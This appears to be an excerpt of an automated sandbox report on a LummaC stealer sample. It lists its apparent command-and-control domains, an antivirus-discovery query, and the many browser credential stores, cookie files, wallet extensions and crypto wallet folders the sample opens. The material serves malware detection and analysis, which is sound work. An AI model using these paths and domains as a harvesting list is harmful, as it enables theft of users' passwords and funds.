              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2037057528.0000000003EDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: file.exe, 00000000.00000003.2037057528.0000000003ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3288B rdtsc 0_2_00C3288B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B25970 LdrInitializeThunk,0_2_00B25970

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: file.exe, 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: demonstationfukewko.shop
              Source: file.exe, 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: liabilitynighstjsko.shop
              Source: file.exe, 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: alcojoldwograpciw.shop
              Source: file.exe, 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: incredibleextedwj.shop
              Source: file.exe, 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: shortsvelventysjo.shop
              Source: file.exe, 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: shatterbreathepsw.shop
              Source: file.exe, 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: tolerateilusidjukl.shop
              Source: file.exe, 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: productivelookewr.shop
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: file.exe, 00000000.00000002.2108143321.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106771903.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2080515794.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079235010.0000000001A3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6608, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: file.exe, 00000000.00000003.2106722434.00000000019BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
              Source: file.exe, 00000000.00000002.2108071195.0000000001A0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: file.exe, 00000000.00000003.2106722434.00000000019BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: file.exe, 00000000.00000003.2106722434.00000000019BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: file.exe, 00000000.00000003.2074929034.0000000001A0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
              Source: file.exe, 00000000.00000003.2106722434.00000000019BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
              Source: file.exe, 00000000.00000002.2108071195.0000000001A0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exe, 00000000.00000003.2074929034.0000000001A0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: file.exe, 00000000.00000003.2036534716.0000000001996000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6608, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6608, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Virtualization/Sandbox Evasion              		1
              OS Credential Dumping              		131
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		21
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
